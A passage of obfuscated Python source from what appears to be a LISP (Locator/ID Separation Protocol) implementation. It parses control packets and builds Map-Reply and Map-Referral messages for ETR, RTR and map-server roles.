if 48 - 48: ooOoO0o - iII111i + I1ii11iIi11i * I1Ii111 % ooOoO0o * OoO0O00
if 28 - 28: i1IIi / iII111i + OOooOOo
if 89 - 89: Oo0Ooo + II111iiii * OoO0O00 + Oo0Ooo % II111iiii
if 59 - 59: O0 + Oo0Ooo
if ( len ( iiooo0o0oO ) > 5 ) :
Oo00oo = lisp_bit_stuff ( iiooo0o0oO [ 4 : : ] )
else :
Oo00oo = iiooo0o0oO [ 4 ]
if 63 - 63: OoO0O00 / I1IiiI / oO0o . Ii1I / i1IIi
if 50 - 50: I11i . I11i % I1IiiI - i1IIi
if 63 - 63: OoO0O00 . iII111i
if 28 - 28: ooOoO0o . Oo0Ooo - OoooooooOO - I1Ii111 - OoooooooOO - oO0o
if 25 - 25: I11i / I1Ii111 . i11iIiiIii % i1IIi
if 21 - 21: O0 * IiII . iII111i / iII111i % i11iIiiIii / I11i
oo0OOOOOOOo0 , Oo00oo = lisp_receive_segments ( lisp_socket , Oo00oo ,
O0oo0OoO0oo , II1IIII )
if ( Oo00oo == None ) : return ( [ "" , "" , "" , "" ] )
if 15 - 15: o0oOOo0O0Ooo / OoO0O00 - i1IIi
if 30 - 30: OoO0O00 / ooOoO0o % ooOoO0o
if 40 - 40: i1IIi . iIii1I11I1II1 * OoOoOO00
if 83 - 83: iIii1I11I1II1 + Ii1I - Ii1I % II111iiii
if 82 - 82: O0
if ( oo0OOOOOOOo0 == False ) :
iiooo0o0oO = Oo00oo
continue
if 18 - 18: iII111i . IiII . I1IiiI
if 40 - 40: IiII / oO0o + OoooooooOO / iII111i / II111iiii + i1IIi
if ( ooO0 == "" ) : ooO0 = "no-port"
if ( oO0000o00OO == "command" and lisp_i_am_core == False ) :
OOOooo0OooOoO = Oo00oo . find ( b" {" )
I1II1i = Oo00oo if OOOooo0OooOoO == - 1 else Oo00oo [ : OOOooo0OooOoO ]
I1II1i = ": '" + I1II1i . decode ( ) + "'"
else :
I1II1i = ""
if 81 - 81: oO0o % i11iIiiIii / Ii1I
if 3 - 3: I1IiiI - O0 % O0
lprint ( "{} {} bytes {} {}, {}{}" . format ( bold ( "Receive" , False ) ,
len ( Oo00oo ) , bold ( "from " + O0oo0OoO0oo , False ) , ooO0 , oO0000o00OO ,
I1II1i if ( oO0000o00OO in [ "command" , "api" ] ) else ": ... " if ( oO0000o00OO == "data-packet" ) else ": " + lisp_format_packet ( Oo00oo ) ) )
if 85 - 85: iIii1I11I1II1 % OoooooooOO . Oo0Ooo * i1IIi . iIii1I11I1II1
if 19 - 19: oO0o + II111iiii - OOooOOo
if 70 - 70: i1IIi * o0oOOo0O0Ooo + I1Ii111 . ooOoO0o - O0 + i11iIiiIii
if 81 - 81: iIii1I11I1II1 - OoO0O00 . i11iIiiIii
if 4 - 4: o0oOOo0O0Ooo / OoO0O00 - I11i
if ( iiiIIi1I1I1 ) : continue
return ( [ oO0000o00OO , O0oo0OoO0oo , ooO0 , Oo00oo ] )
if 52 - 52: II111iiii . iII111i
if 36 - 36: I1IiiI * II111iiii
if 68 - 68: oO0o * o0oOOo0O0Ooo + OoooooooOO - I1ii11iIi11i * i1IIi % OOooOOo
if 39 - 39: I1Ii111 / I11i + oO0o / I1Ii111 % IiII * I1ii11iIi11i
if 66 - 66: I1ii11iIi11i * ooOoO0o . i11iIiiIii * Oo0Ooo - I11i . I1IiiI
if 43 - 43: I11i . iII111i . IiII - oO0o
if 60 - 60: i1IIi + iII111i * i1IIi . iII111i
if 40 - 40: i1IIi . OoO0O00
def lisp_parse_packet ( lisp_sockets , packet , source , udp_sport , ttl = - 1 ) :
o0000o = False
iIIi1iiii1ii = time . time ( )
if 100 - 100: iIii1I11I1II1 * I1IiiI * Ii1I * i1IIi . I1Ii111 * I1IiiI
IiIii1iIIII = lisp_control_header ( )
if ( IiIii1iIIII . decode ( packet ) == None ) :
lprint ( "Could not decode control header" )
return ( o0000o )
if 54 - 54: o0oOOo0O0Ooo / iII111i + IiII - o0oOOo0O0Ooo - I11i
if 28 - 28: I1IiiI - iIii1I11I1II1 - o0oOOo0O0Ooo * IiII + OoooooooOO
if 52 - 52: I1Ii111
if 86 - 86: O0 * IiII + OoOoOO00 + OoO0O00
if 53 - 53: I1IiiI % i11iIiiIii + o0oOOo0O0Ooo . I1ii11iIi11i
O0oOO0O00 = source
if ( source . find ( "lisp" ) == - 1 ) :
I111 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
I111 . string_to_afi ( source )
I111 . store_address ( source )
source = I111
if 52 - 52: IiII % iII111i
if 74 - 74: II111iiii . II111iiii + I1IiiI / OoO0O00
if ( IiIii1iIIII . type == LISP_MAP_REQUEST ) :
lisp_process_map_request ( lisp_sockets , packet , None , 0 , source ,
udp_sport , False , ttl , iIIi1iiii1ii )
if 86 - 86: Ii1I + Ii1I - Oo0Ooo * I1IiiI
elif ( IiIii1iIIII . type == LISP_MAP_REPLY ) :
lisp_process_map_reply ( lisp_sockets , packet , source , ttl , iIIi1iiii1ii )
if 52 - 52: I11i - OoO0O00 - I1IiiI % OoOoOO00 % OoOoOO00 + Oo0Ooo
elif ( IiIii1iIIII . type == LISP_MAP_REGISTER ) :
lisp_process_map_register ( lisp_sockets , packet , source , udp_sport )
if 88 - 88: iIii1I11I1II1 * OoO0O00 / IiII
elif ( IiIii1iIIII . type == LISP_MAP_NOTIFY ) :
if ( O0oOO0O00 == "lisp-etr" ) :
lisp_process_multicast_map_notify ( packet , source )
elif ( lisp_is_running ( "lisp-rtr" ) ) :
lisp_process_multicast_map_notify ( packet , source )
elif ( lisp_is_running ( "lisp-itr" ) ) :
lisp_process_unicast_map_notify ( lisp_sockets , packet , source )
if 74 - 74: I1ii11iIi11i / i11iIiiIii - II111iiii . Oo0Ooo / ooOoO0o
if 55 - 55: OoO0O00 % IiII
elif ( IiIii1iIIII . type == LISP_MAP_NOTIFY_ACK ) :
lisp_process_map_notify_ack ( packet , source )
if 93 - 93: OoO0O00 . I1ii11iIi11i / OOooOOo % OoooooooOO + i1IIi + I1Ii111
elif ( IiIii1iIIII . type == LISP_MAP_REFERRAL ) :
lisp_process_map_referral ( lisp_sockets , packet , source )
if 94 - 94: II111iiii + i11iIiiIii % Ii1I / ooOoO0o * OoOoOO00
elif ( IiIii1iIIII . type == LISP_NAT_INFO and IiIii1iIIII . is_info_reply ( ) ) :
Oo0OoO00O , ii1I1I1iII , o0000o = lisp_process_info_reply ( source , packet , True )
if 68 - 68: O0 / Oo0Ooo / iIii1I11I1II1
elif ( IiIii1iIIII . type == LISP_NAT_INFO and IiIii1iIIII . is_info_reply ( ) == False ) :
O0O0 = source . print_address_no_iid ( )
lisp_process_info_request ( lisp_sockets , packet , O0O0 , udp_sport ,
None )
if 63 - 63: I1Ii111 + iII111i
elif ( IiIii1iIIII . type == LISP_ECM ) :
lisp_process_ecm ( lisp_sockets , packet , source , udp_sport )
if 6 - 6: I1ii11iIi11i + Ii1I
else :
lprint ( "Invalid LISP control packet type {}" . format ( IiIii1iIIII . type ) )
if 36 - 36: iII111i + iII111i * OoO0O00 * I1ii11iIi11i
return ( o0000o )
if 97 - 97: ooOoO0o + OOooOOo
if 70 - 70: o0oOOo0O0Ooo + Ii1I - i11iIiiIii + I11i * o0oOOo0O0Ooo . Ii1I
if 6 - 6: Oo0Ooo + I1IiiI
if 48 - 48: oO0o . I1ii11iIi11i
if 59 - 59: IiII - Ii1I
if 62 - 62: OOooOOo * o0oOOo0O0Ooo + IiII * o0oOOo0O0Ooo * i11iIiiIii - O0
if 37 - 37: I1ii11iIi11i - Oo0Ooo . i11iIiiIii / i11iIiiIii + oO0o
def lisp_process_rloc_probe_request ( lisp_sockets , map_request , source , port ,
ttl , timestamp ) :
if 19 - 19: i1IIi / i1IIi - OoooooooOO - OOooOOo . i1IIi
iIIiiIi = bold ( "RLOC-probe" , False )
if 57 - 57: OOooOOo / I1ii11iIi11i * oO0o
if ( lisp_i_am_etr ) :
lprint ( "Received {} Map-Request, send RLOC-probe Map-Reply" . format ( iIIiiIi ) )
lisp_etr_process_map_request ( lisp_sockets , map_request , source , port ,
ttl , timestamp )
return
if 53 - 53: o0oOOo0O0Ooo * Ii1I
if 42 - 42: I11i + iII111i / iIii1I11I1II1
if ( lisp_i_am_rtr ) :
lprint ( "Received {} Map-Request, send RLOC-probe Map-Reply" . format ( iIIiiIi ) )
lisp_rtr_process_map_request ( lisp_sockets , map_request , source , port ,
ttl , timestamp )
return
if 1 - 1: O0 - II111iiii
if 75 - 75: II111iiii / OoO0O00 % II111iiii
lprint ( "Ignoring received {} Map-Request, not an ETR or RTR" . format ( iIIiiIi ) )
return
if 3 - 3: Ii1I - Ii1I % I1ii11iIi11i
if 44 - 44: OOooOOo - o0oOOo0O0Ooo
if 69 - 69: IiII + I1ii11iIi11i / o0oOOo0O0Ooo / OOooOOo
if 31 - 31: oO0o + I1ii11iIi11i * i1IIi % I1IiiI % I1IiiI + iIii1I11I1II1
if 62 - 62: OoooooooOO
def lisp_process_smr ( map_request ) :
lprint ( "Received SMR-based Map-Request" )
return
if 38 - 38: iII111i % iII111i * ooOoO0o / OoO0O00 + ooOoO0o
if 52 - 52: ooOoO0o . iIii1I11I1II1 / iIii1I11I1II1 % oO0o - oO0o * II111iiii
if 57 - 57: I1Ii111
if 23 - 23: I1ii11iIi11i + II111iiii
if 99 - 99: o0oOOo0O0Ooo . I1IiiI + o0oOOo0O0Ooo * o0oOOo0O0Ooo / O0
def lisp_process_smr_invoked_request ( map_request ) :
lprint ( "Received SMR-invoked Map-Request" )
return
if 27 - 27: OOooOOo - I1Ii111
if 33 - 33: OOooOOo - Ii1I - iII111i + I1ii11iIi11i - i11iIiiIii
if 89 - 89: iIii1I11I1II1 * I11i + OOooOOo
if 27 - 27: i1IIi - OoO0O00
if 23 - 23: iIii1I11I1II1 + Oo0Ooo * IiII
if 80 - 80: OoooooooOO . ooOoO0o
if 52 - 52: O0 + O0 + I1IiiI
def lisp_build_map_reply ( eid , group , rloc_set , nonce , action , ttl , map_request ,
keys , enc , auth , mr_ttl = - 1 ) :
if 64 - 64: ooOoO0o
IIi1Ii = map_request . rloc_probe if ( map_request != None ) else False
iiiI = map_request . json_telemetry if ( map_request != None ) else None
if 87 - 87: I11i + IiII / OOooOOo
if 70 - 70: II111iiii
IiOo0oOoooO = lisp_map_reply ( )
IiOo0oOoooO . rloc_probe = IIi1Ii
IiOo0oOoooO . echo_nonce_capable = enc
IiOo0oOoooO . hop_count = 0 if ( mr_ttl == - 1 ) else mr_ttl
IiOo0oOoooO . record_count = 1
IiOo0oOoooO . nonce = nonce
Oo00oo = IiOo0oOoooO . encode ( )
IiOo0oOoooO . print_map_reply ( )
if 84 - 84: I1ii11iIi11i * Oo0Ooo % I1IiiI - i11iIiiIii . OoooooooOO
o0o0Ooo0OO00o = lisp_eid_record ( )
o0o0Ooo0OO00o . rloc_count = len ( rloc_set )
if ( iiiI != None ) : o0o0Ooo0OO00o . rloc_count += 1
o0o0Ooo0OO00o . authoritative = auth
o0o0Ooo0OO00o . record_ttl = ttl
o0o0Ooo0OO00o . action = action
o0o0Ooo0OO00o . eid = eid
o0o0Ooo0OO00o . group = group
if 5 - 5: I1ii11iIi11i
Oo00oo += o0o0Ooo0OO00o . encode ( )
o0o0Ooo0OO00o . print_record ( " " , False )
if 16 - 16: OoO0O00 . II111iiii - i1IIi % II111iiii + ooOoO0o + OoooooooOO
ii1i1iiiI = lisp_get_all_addresses ( ) + lisp_get_all_translated_rlocs ( )
if 36 - 36: iIii1I11I1II1 + I1IiiI + OoOoOO00 . iIii1I11I1II1
iIiIii1I1 = None
for OOOoOoo in rloc_set :
II1OO0Oo0oOOO000 = OOOoOoo . rloc . is_multicast_address ( )
ooOoooO = lisp_rloc_record ( )
ii11I1 = IIi1Ii and ( II1OO0Oo0oOOO000 or iiiI == None )
O0O0 = OOOoOoo . rloc . print_address_no_iid ( )
if ( O0O0 in ii1i1iiiI or II1OO0Oo0oOOO000 ) :
ooOoooO . local_bit = True
ooOoooO . probe_bit = ii11I1
ooOoooO . keys = keys
if ( OOOoOoo . priority == 254 and lisp_i_am_rtr ) :
ooOoooO . rloc_name = "RTR"
if 74 - 74: i11iIiiIii . Ii1I . I1IiiI * I1IiiI
if ( iIiIii1I1 == None ) : iIiIii1I1 = OOOoOoo . rloc
if 51 - 51: oO0o . Oo0Ooo / i1IIi + i1IIi * i1IIi
ooOoooO . store_rloc_entry ( OOOoOoo )
ooOoooO . reach_bit = True
ooOoooO . print_record ( " " )
Oo00oo += ooOoooO . encode ( )
if 32 - 32: I1IiiI + IiII + iII111i . iIii1I11I1II1 * Ii1I
if 27 - 27: oO0o + Ii1I . i11iIiiIii
if 97 - 97: iII111i . I1IiiI
if 71 - 71: OOooOOo - IiII % oO0o * I1ii11iIi11i
if 48 - 48: o0oOOo0O0Ooo * iIii1I11I1II1 + Oo0Ooo
if ( iiiI != None ) :
ooOoooO = lisp_rloc_record ( )
if ( iIiIii1I1 ) : ooOoooO . rloc . copy_address ( iIiIii1I1 )
ooOoooO . local_bit = True
ooOoooO . probe_bit = True
ooOoooO . reach_bit = True
if ( lisp_i_am_rtr ) :
ooOoooO . priority = 254
ooOoooO . rloc_name = "RTR"
if 45 - 45: oO0o
I1i1iiII1iI1i = lisp_encode_telemetry ( iiiI , eo = str ( time . time ( ) ) )
ooOoooO . json = lisp_json ( "telemetry" , I1i1iiII1iI1i )
ooOoooO . print_record ( " " )
Oo00oo += ooOoooO . encode ( )
if 72 - 72: I1ii11iIi11i
return ( Oo00oo )
if 100 - 100: i11iIiiIii - iII111i - I11i
if 5 - 5: oO0o % IiII * iII111i
if 98 - 98: iII111i / OOooOOo + IiII
if 100 - 100: II111iiii . i11iIiiIii / oO0o - OOooOOo + OoOoOO00 % I1ii11iIi11i
if 82 - 82: ooOoO0o % OOooOOo % Ii1I
if 82 - 82: I1ii11iIi11i
if 52 - 52: i11iIiiIii % I1Ii111 - iII111i / O0 - I1ii11iIi11i / iII111i
def lisp_build_map_referral ( eid , group , ddt_entry , action , ttl , nonce ) :
iiIII111I111 = lisp_map_referral ( )
iiIII111I111 . record_count = 1
iiIII111I111 . nonce = nonce
Oo00oo = iiIII111I111 . encode ( )
iiIII111I111 . print_map_referral ( )
if 9 - 9: OOooOOo + IiII - I1ii11iIi11i . OOooOOo + I11i
o0o0Ooo0OO00o = lisp_eid_record ( )
if 91 - 91: OoOoOO00 . i1IIi
I1111i = 0
if ( ddt_entry == None ) :
o0o0Ooo0OO00o . eid = eid
o0o0Ooo0OO00o . group = group
else :
I1111i = len ( ddt_entry . delegation_set )
o0o0Ooo0OO00o . eid = ddt_entry . eid
o0o0Ooo0OO00o . group = ddt_entry . group
ddt_entry . map_referrals_sent += 1
if 36 - 36: ooOoO0o * i1IIi + iII111i * OOooOOo * Ii1I
o0o0Ooo0OO00o . rloc_count = I1111i
o0o0Ooo0OO00o . authoritative = True
if 74 - 74: Oo0Ooo - Oo0Ooo . I11i + I11i * OoO0O00
if 48 - 48: iIii1I11I1II1 . I11i . II111iiii
if 45 - 45: oO0o + ooOoO0o + OOooOOo * OOooOOo * o0oOOo0O0Ooo / Oo0Ooo
if 61 - 61: OoooooooOO % i11iIiiIii . i1IIi . OOooOOo
if 90 - 90: iIii1I11I1II1 - iIii1I11I1II1 % O0
oO00O0o0Oo = False
if ( action == LISP_DDT_ACTION_NULL ) :
if ( I1111i == 0 ) :
action = LISP_DDT_ACTION_NODE_REFERRAL
else :
o0oO0OO0Oo0 = ddt_entry . delegation_set [ 0 ]
if ( o0oO0OO0Oo0 . is_ddt_child ( ) ) :
action = LISP_DDT_ACTION_NODE_REFERRAL
if 43 - 43: Oo0Ooo / i1IIi % Ii1I . OoOoOO00
if ( o0oO0OO0Oo0 . is_ms_child ( ) ) :
action = LISP_DDT_ACTION_MS_REFERRAL
if 22 - 22: iIii1I11I1II1 + Ii1I
if 73 - 73: I1IiiI / OoO0O00 / OoooooooOO
if 14 - 14: ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i . IiII + I1ii11iIi11i
if 30 - 30: I1ii11iIi11i + iIii1I11I1II1 . I1ii11iIi11i
if 9 - 9: I1IiiI - Ii1I * II111iiii - I11i
if 85 - 85: oO0o % ooOoO0o / OOooOOo
if 50 - 50: O0 * O0 / iIii1I11I1II1
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : oO00O0o0Oo = True
if ( action in ( LISP_DDT_ACTION_MS_REFERRAL , LISP_DDT_ACTION_MS_ACK ) ) :
oO00O0o0Oo = ( lisp_i_am_ms and o0oO0OO0Oo0 . is_ms_peer ( ) == False )
if 31 - 31: I1IiiI / o0oOOo0O0Ooo
if 70 - 70: I1IiiI
o0o0Ooo0OO00o . action = action
o0o0Ooo0OO00o . ddt_incomplete = oO00O0o0Oo
o0o0Ooo0OO00o . record_ttl = ttl
if 36 - 36: ooOoO0o . oO0o . I11i - I1ii11iIi11i / OoOoOO00 * Oo0Ooo
Oo00oo += o0o0Ooo0OO00o . encode ( )
o0o0Ooo0OO00o . print_record ( " " , True )
if 42 - 42: OoooooooOO / o0oOOo0O0Ooo . Ii1I * iII111i * I1IiiI - Oo0Ooo
if ( I1111i == 0 ) : return ( Oo00oo )
if 76 - 76: oO0o * II111iiii
for o0oO0OO0Oo0 in ddt_entry . delegation_set :
ooOoooO = lisp_rloc_record ( )
ooOoooO . rloc = o0oO0OO0Oo0 . delegate_address
ooOoooO . priority = o0oO0OO0Oo0 . priority
ooOoooO . weight = o0oO0OO0Oo0 . weight
ooOoooO . mpriority = 255
ooOoooO . mweight = 0
ooOoooO . reach_bit = True
Oo00oo += ooOoooO . encode ( )
ooOoooO . print_record ( " " )
if 81 - 81: I11i
return ( Oo00oo )
if 2 - 2: OoOoOO00
if 75 - 75: I1IiiI - OoooooooOO * I1Ii111
if 1 - 1: o0oOOo0O0Ooo % oO0o * I1Ii111 - i1IIi - iII111i . oO0o
if 25 - 25: i1IIi * o0oOOo0O0Ooo / oO0o
if 11 - 11: IiII + II111iiii
if 37 - 37: O0
if 98 - 98: IiII * OoooooooOO . iII111i
def lisp_etr_process_map_request ( lisp_sockets , map_request , source , sport ,
ttl , etr_in_ts ) :
if 34 - 34: OoooooooOO + I1Ii111
if ( map_request . target_group . is_null ( ) ) :
OoO0oO = lisp_db_for_lookups . lookup_cache ( map_request . target_eid , False )
else :
OoO0oO = lisp_db_for_lookups . lookup_cache ( map_request . target_group , False )
if ( OoO0oO ) : OoO0oO = OoO0oO . lookup_source_cache ( map_request . target_eid , False )
if 57 - 57: iII111i
i1iiii = map_request . print_prefix ( )
if 9 - 9: i1IIi - I1Ii111 + I1Ii111
if ( OoO0oO == None ) :
lprint ( "Database-mapping entry not found for requested EID {}" . format ( green ( i1iiii , False ) ) )
if 81 - 81: II111iiii % I11i % O0 . I1Ii111 % ooOoO0o - O0
return
if 58 - 58: OoooooooOO . II111iiii . O0 % I1Ii111 / OoooooooOO
if 64 - 64: Oo0Ooo + oO0o . OoO0O00
o0oo0OO0oO = OoO0oO . print_eid_tuple ( )
if 95 - 95: I1Ii111 . IiII % OoO0O00 - OOooOOo - I11i
lprint ( "Found database-mapping EID-prefix {} for requested EID {}" . format ( green ( o0oo0OO0oO , False ) , green ( i1iiii , False ) ) )
if 55 - 55: OoooooooOO % I1ii11iIi11i % iII111i / IiII
if 65 - 65: II111iiii
if 58 - 58: iIii1I11I1II1 / i11iIiiIii . iII111i . OOooOOo * I1ii11iIi11i + OoooooooOO
if 13 - 13: OoooooooOO + iII111i * i11iIiiIii % IiII + oO0o . o0oOOo0O0Ooo
if 31 - 31: o0oOOo0O0Ooo - ooOoO0o
iiII1 = map_request . itr_rlocs [ 0 ]
if ( iiII1 . is_private_address ( ) and lisp_nat_traversal ) :
iiII1 = source
if 60 - 60: IiII + I1IiiI
if 61 - 61: OoO0O00
o0Oo0o = map_request . nonce
O00oooO0 = lisp_nonce_echoing
iI1iiiiiii = map_request . keys
if 10 - 10: I1IiiI
if 14 - 14: OoO0O00
if 88 - 88: i1IIi * II111iiii / i11iIiiIii % IiII . IiII
if 93 - 93: OoOoOO00 * i1IIi . Ii1I
if 2 - 2: i1IIi
OoO00 = map_request . json_telemetry
if ( OoO00 != None ) :
map_request . json_telemetry = lisp_encode_telemetry ( OoO00 , ei = etr_in_ts )
if 48 - 48: Ii1I
if 62 - 62: oO0o - I1ii11iIi11i - oO0o - OoO0O00 * Oo0Ooo
OoO0oO . map_replies_sent += 1
if 47 - 47: o0oOOo0O0Ooo
Oo00oo = lisp_build_map_reply ( OoO0oO . eid , OoO0oO . group , OoO0oO . rloc_set , o0Oo0o ,
LISP_NO_ACTION , 1440 , map_request , iI1iiiiiii , O00oooO0 , True , ttl )
if 88 - 88: iIii1I11I1II1 + OOooOOo . II111iiii / i11iIiiIii % OOooOOo % IiII
if 38 - 38: OOooOOo
if 82 - 82: OoOoOO00 % II111iiii * ooOoO0o + OoooooooOO + I1IiiI
if 89 - 89: ooOoO0o % i1IIi - OoooooooOO
if 100 - 100: Ii1I % I1ii11iIi11i % I1IiiI
if 19 - 19: I1ii11iIi11i . o0oOOo0O0Ooo % Oo0Ooo / OoooooooOO
if 68 - 68: iII111i
if 55 - 55: IiII . i11iIiiIii % OoooooooOO
if 88 - 88: Ii1I * o0oOOo0O0Ooo / oO0o
if 58 - 58: O0
if 43 - 43: O0 / i1IIi / I11i % I1IiiI
if 82 - 82: i11iIiiIii * i11iIiiIii + I1Ii111 - I1ii11iIi11i * oO0o - Ii1I
if 40 - 40: o0oOOo0O0Ooo + OoO0O00 % i1IIi % iII111i * I1Ii111
if 36 - 36: I1ii11iIi11i % II111iiii % I1Ii111 / I1ii11iIi11i
if 34 - 34: OoooooooOO * i11iIiiIii
if 33 - 33: II111iiii
if ( map_request . rloc_probe and len ( lisp_sockets ) == 4 ) :
I1I111i = ( iiII1 . is_private_address ( ) == False )
iiO0ooooOooo = iiII1 . print_address_no_iid ( )
if ( I1I111i and iiO0ooooOooo in lisp_rtr_list or sport == 0 ) :
lisp_encapsulate_rloc_probe ( lisp_sockets , iiII1 , None , Oo00oo )
return
if 59 - 59: iIii1I11I1II1 % I11i
if 93 - 93: I1ii11iIi11i
if 50 - 50: ooOoO0o % OoO0O00 % OoO0O00
if 36 - 36: I1IiiI * O0 . IiII / I1Ii111
if 15 - 15: I11i + iII111i
if 79 - 79: i11iIiiIii * IiII % iII111i
lisp_send_map_reply ( lisp_sockets , Oo00oo , iiII1 , sport )
return
if 18 - 18: iIii1I11I1II1 - O0 . o0oOOo0O0Ooo % oO0o
if 73 - 73: IiII + I11i % I1IiiI * iII111i . O0
if 17 - 17: OoO0O00 * OoOoOO00 % O0 % iII111i / i1IIi
if 100 - 100: i11iIiiIii
if 54 - 54: O0 * Ii1I + Ii1I
if 59 - 59: i11iIiiIii % iII111i
if 54 - 54: I11i . ooOoO0o / OOooOOo % I1Ii111
def lisp_rtr_process_map_request ( lisp_sockets , map_request , source , sport ,
ttl , etr_in_ts ) :
if 13 - 13: I11i / O0 . o0oOOo0O0Ooo . ooOoO0o
if 7 - 7: OoO0O00 + OoooooooOO % II111iiii % oO0o
if 48 - 48: OOooOOo . II111iiii * OOooOOo - I11i / iIii1I11I1II1 / i11iIiiIii
if 37 - 37: II111iiii % O0 + iIii1I11I1II1 - I1IiiI . I11i + I1ii11iIi11i
iiII1 = map_request . itr_rlocs [ 0 ]
if ( iiII1 . is_private_address ( ) ) : iiII1 = source
o0Oo0o = map_request . nonce
if 14 - 14: ooOoO0o % iIii1I11I1II1 % ooOoO0o / IiII + OOooOOo
o0Ooo0Oooo0o = map_request . target_eid
oo0oOooo0O = map_request . target_group
if 14 - 14: Oo0Ooo
OO00O000OOO = [ ]
for iIi1Ii1i in [ lisp_myrlocs [ 0 ] , lisp_myrlocs [ 1 ] ] :
if ( iIi1Ii1i == None ) : continue
iIIiI11 = lisp_rloc ( )
iIIiI11 . rloc . copy_address ( iIi1Ii1i )
iIIiI11 . priority = 254
OO00O000OOO . append ( iIIiI11 )
if 46 - 46: II111iiii . i11iIiiIii + I1ii11iIi11i + I1IiiI
if 74 - 74: iII111i - Ii1I - iII111i
O00oooO0 = lisp_nonce_echoing
iI1iiiiiii = map_request . keys
if 23 - 23: I1ii11iIi11i
if 69 - 69: OOooOOo * I11i % i11iIiiIii
if 63 - 63: OoOoOO00 + I1IiiI / I1ii11iIi11i / o0oOOo0O0Ooo % I1IiiI
if 67 - 67: I1Ii111 . oO0o % I1ii11iIi11i % OOooOOo + I1IiiI
if 4 - 4: iII111i - i11iIiiIii * ooOoO0o
OoO00 = map_request . json_telemetry
if ( OoO00 != None ) :
map_request . json_telemetry = lisp_encode_telemetry ( OoO00 , ei = etr_in_ts )
if 74 - 74: Oo0Ooo . OOooOOo + OOooOOo / OOooOOo + I1IiiI + i1IIi
if 32 - 32: i11iIiiIii % Ii1I
Oo00oo = lisp_build_map_reply ( o0Ooo0Oooo0o , oo0oOooo0O , OO00O000OOO , o0Oo0o , LISP_NO_ACTION ,
1440 , map_request , iI1iiiiiii , O00oooO0 , True , ttl )
lisp_send_map_reply ( lisp_sockets , Oo00oo , iiII1 , sport )
return
if 92 - 92: OoOoOO00 % o0oOOo0O0Ooo % ooOoO0o - IiII - oO0o
if 90 - 90: ooOoO0o
if 11 - 11: OoOoOO00 % OOooOOo . i11iIiiIii * I1IiiI % O0 % iIii1I11I1II1
if 18 - 18: Oo0Ooo % OOooOOo + IiII
if 28 - 28: OOooOOo . OoO0O00 / o0oOOo0O0Ooo + II111iiii / iIii1I11I1II1 * II111iiii
if 83 - 83: II111iiii . OoOoOO00 - i11iIiiIii . OoOoOO00 . i1IIi % OoooooooOO
if 47 - 47: II111iiii
if 30 - 30: i1IIi . Oo0Ooo / o0oOOo0O0Ooo + IiII * OOooOOo
if 26 - 26: Ii1I % O0 - i1IIi % iII111i * OoO0O00
if 60 - 60: I1ii11iIi11i * iII111i / OoOoOO00 . o0oOOo0O0Ooo / iIii1I11I1II1
def lisp_get_private_rloc_set ( target_site_eid , seid , group ) :
OO00O000OOO = target_site_eid . registered_rlocs
if 94 - 94: OoO0O00 . ooOoO0o
i111i1iIi1i = lisp_site_eid_lookup ( seid , group , False )
if ( i111i1iIi1i == None ) : return ( OO00O000OOO )
if 25 - 25: II111iiii % I11i
if 16 - 16: OoOoOO00 % iII111i . OOooOOo * iIii1I11I1II1 / oO0o . OoooooooOO
if 13 - 13: oO0o / iII111i . oO0o * i11iIiiIii . iIii1I11I1II1
if 74 - 74: Ii1I / iIii1I11I1II1 + OOooOOo . II111iiii
oO00Oooo0o0o0 = None
Oo0O0O0oo0 = [ ]
for OOOoOoo in OO00O000OOO :
if ( OOOoOoo . is_rtr ( ) ) : continue
if ( OOOoOoo . rloc . is_private_address ( ) ) :
oOoOOOoO0O0oo = copy . deepcopy ( OOOoOoo )
Oo0O0O0oo0 . append ( oOoOOOoO0O0oo )
continue
if 20 - 20: iII111i - OOooOOo - I11i * oO0o
oO00Oooo0o0o0 = OOOoOoo
break
if 88 - 88: I1IiiI - I1Ii111
if ( oO00Oooo0o0o0 == None ) : return ( OO00O000OOO )
oO00Oooo0o0o0 = oO00Oooo0o0o0 . rloc . print_address_no_iid ( )
if 50 - 50: OoOoOO00
if 67 - 67: OOooOOo
if 90 - 90: Oo0Ooo % iII111i % Oo0Ooo * I11i / OoOoOO00
if 49 - 49: I1ii11iIi11i * II111iiii
o0ooO00 = None
for OOOoOoo in i111i1iIi1i . registered_rlocs :
if ( OOOoOoo . is_rtr ( ) ) : continue
if ( OOOoOoo . rloc . is_private_address ( ) ) : continue
o0ooO00 = OOOoOoo
break
if 40 - 40: I11i . iII111i + OoOoOO00 % I1ii11iIi11i
if ( o0ooO00 == None ) : return ( OO00O000OOO )
o0ooO00 = o0ooO00 . rloc . print_address_no_iid ( )
if 79 - 79: I1Ii111 - OOooOOo * I1ii11iIi11i + i11iIiiIii . iII111i
if 3 - 3: Oo0Ooo
if 81 - 81: OoO0O00 / OoO0O00 . I1ii11iIi11i
if 100 - 100: iIii1I11I1II1 % II111iiii - I1ii11iIi11i . iIii1I11I1II1 + IiII % iIii1I11I1II1
o0o0oo0oO = target_site_eid . site_id
if ( o0o0oo0oO == 0 ) :
if ( o0ooO00 == oO00Oooo0o0o0 ) :
lprint ( "Return private RLOCs for sites behind {}" . format ( oO00Oooo0o0o0 ) )
if 48 - 48: Ii1I % i1IIi
return ( Oo0O0O0oo0 )
if 38 - 38: OOooOOo / I1ii11iIi11i % oO0o / o0oOOo0O0Ooo
return ( OO00O000OOO )
if 54 - 54: OoOoOO00 * OoooooooOO - OoO0O00 * OoOoOO00 % I1ii11iIi11i * I11i
if 34 - 34: I11i - oO0o + I11i * OoooooooOO * I11i
if 73 - 73: OOooOOo * iII111i * OoO0O00
if 11 - 11: I1Ii111 * II111iiii
if 3 - 3: Oo0Ooo * OOooOOo
if 13 - 13: I1Ii111 + i11iIiiIii / OOooOOo
if 98 - 98: I1IiiI * Oo0Ooo
if ( o0o0oo0oO == i111i1iIi1i . site_id ) :
lprint ( "Return private RLOCs for sites in site-id {}" . format ( o0o0oo0oO ) )
return ( Oo0O0O0oo0 )
if 9 - 9: O0 / i11iIiiIii . iIii1I11I1II1 . IiII
return ( OO00O000OOO )
if 14 - 14: OoOoOO00 . OOooOOo - Oo0Ooo + I1Ii111 % ooOoO0o
if 95 - 95: OoO0O00 * II111iiii + i1IIi
if 22 - 22: Ii1I / ooOoO0o % I11i + OoO0O00 . ooOoO0o
if 61 - 61: O0 - iIii1I11I1II1 * Oo0Ooo . Ii1I + O0
if 20 - 20: ooOoO0o / ooOoO0o - Ii1I - ooOoO0o
